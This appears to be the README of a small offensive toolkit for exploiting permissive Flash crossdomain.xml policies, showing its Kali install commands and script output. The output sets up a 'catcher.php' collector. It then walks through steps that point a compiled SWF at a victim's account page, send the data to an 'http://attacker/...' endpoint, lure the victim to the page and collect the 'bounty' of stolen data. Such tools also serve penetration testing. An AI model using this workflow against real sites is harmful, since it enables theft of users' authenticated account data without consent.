While not much of a framework just yet, everything you need to exploit overly permissive crossdomain.xml files is here.
Kali
root@kali:~# git clone https://github.com/sethsec/crossdomain-exploitation-framework.git
root@kali:~# cd crossdomain-exploitation-framework
root@kali:~/crossdomain-exploitation-framework# ./install.sh
root@kali-Preso:~/crossdomain-exploitation-framework# ./install.sh
This install script will perform the following actions:
1) Download and install openjdk-6-jdk and php5
2) Download and install Adobe Flex (A 230mb download)
3) Drop a php "catcher.php" script in the web root
4) Download Gursev Kalra's ActionScript3 template
5) Provide you with my additional ActionScript3 examples
6) Configure your Apache instance to support SSL
7) Restart your Apache instance
8) Give you some guidance on how to compile your ActionScript3 into a SWF
Unrelated to compiling SWF files, this script will also copy the
http-crossdomain.nse NMAP script into /usr/share/nmap/scripts/
so that you can use it. I'll remove this once the nse gets added
to NMAP.
Before we get started, here is your opportunity to deviate from
the default file locations.
To accept the default settings, just hit enter:
* Flex Install Location [/opt/flex]:
* Location for catcher.php [/var/www/crossdomain]:
* Location for xdx.html [/var/www/crossdomain]:
* Location for ActionScript3 templates [/home/seth/crossdomain-exploitation-framework/actionscript-templates]:
<snip>
*****************
* Next Steps *
*****************
1) Edit the /home/seth/crossdomain-exploitation-framework/actionscript-templates/XDomainXploit.as file
a) Specify the target URL
Something like: http://vulnerable.com/account/settings
b) Specify the server and page you want to send the data to:
Something like: http://attacker/crossdomain/catcher.php
2) Compile the file:
a) /opt/flex/bin/mxmlc /home/seth/crossdomain-exploitation-framework/actionscript-templates/XDomainXploit.as --output /var/www/crossdomain/XDomainXploit.swf
3) Edit /var/www/crossdomain/xdx.html and make sure it is pointing to the right SWF file
4) Get your victim to navigate to http://<your-hostname-or-ip>/<path>/xdx.html
5) Collect your bounty at /tmp/crossdomain_bounty.txt
* Additional templates have been provided, and are located in the following directory:
* /home/seth/crossdomain-exploitation-framework/actionscript-templates
Good luck!